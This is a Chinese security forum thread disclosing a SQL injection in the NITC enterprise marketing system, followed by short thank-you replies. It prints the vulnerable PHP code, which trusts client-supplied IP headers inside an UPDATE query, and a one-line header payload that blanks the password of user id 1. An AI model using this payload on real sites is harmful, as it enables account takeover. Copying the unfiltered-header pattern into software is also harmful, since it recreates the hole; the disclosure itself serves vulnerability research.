查看: 11975|回复: 4

NITC企业版SQL注入,可重置任意用户密码

[复制链接]
  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2014-12-24 15:03:41 | 显示全部楼层 |阅读模式
    NITC企业智能营销系统

    [AppleScript] 纯文本查看 复制代码
    function getip( )
    {
        if ( isset( $_SERVER ) )
        {
            if ( isset( $_SERVER[HTTP_X_FORWARDED_FOR] ) )
            {
                $realip = $_SERVER[HTTP_X_FORWARDED_FOR];
                return $realip;
            }
            if ( isset( $_SERVER[HTTP_CLIENT_IP] ) )
            {
                $realip = $_SERVER[HTTP_CLIENT_IP];
                return $realip;
            }
            $realip = $_SERVER[REMOTE_ADDR];
            return $realip;
        }
        if ( getenv( "HTTP_X_FORWARDED_FOR" ) )
        {
            $realip = getenv( "HTTP_X_FORWARDED_FOR" );
            return $realip;
        }
        if ( getenv( "HTTP_CLIENT_IP" ) )
        {
            $realip = getenv( "HTTP_CLIENT_IP" );
            return $realip;
        }
        $realip = getenv( "REMOTE_ADDR" );
        return $realip;
    }
    

    ip获取没有进行过滤,导致网站多处sql注入
    [AppleScript] 纯文本查看 复制代码
    if ( $action == "login" )
     
    {
          ....
          $ip = getip( );
                $_SESSION['member_email'] = $email;
                $_SESSION['member_id'] = $result['member_id'];
                $_SESSION['state'] = $result['state'];
                $_SESSION['member_name'] = $result['name'];
                $site->table( "member" )( "update ".$site->table( "member" ).( " set last_ip='".$ip."',last_time='" ).date( "Y-m-d H:i:s", time( ) )."' where member_id=".$result['member_id'] );
    }
    

    此处 用户登录的时候,记录用户登录IP操作,由于update用户数据,可以直接利用sql注入update任意用户的密码。


    POC: head头上加入 client-ip:',password='' where member_id=1#


    解决方案:

    过滤
    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-12-24 16:45:14 | 显示全部楼层
    略屌。。。学习了。。。
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2016-8-27 01:19
  • 签到天数: 50 天

    [LV.5]常住居民I

    发表于 2014-12-24 18:12:56 | 显示全部楼层
    感谢楼主              
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2017-4-24 14:55
  • 签到天数: 54 天

    [LV.5]常住居民I

    发表于 2014-12-24 22:27:05 | 显示全部楼层
    代码审计就是吊。一直在努力
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    奋斗
    2021-12-29 18:17
  • 签到天数: 45 天

    [LV.5]常住居民I

    发表于 2015-1-1 10:11:18 | 显示全部楼层
    登陆成功第一回!
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-23 02:03 , Processed in 0.031518 second(s), 14 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部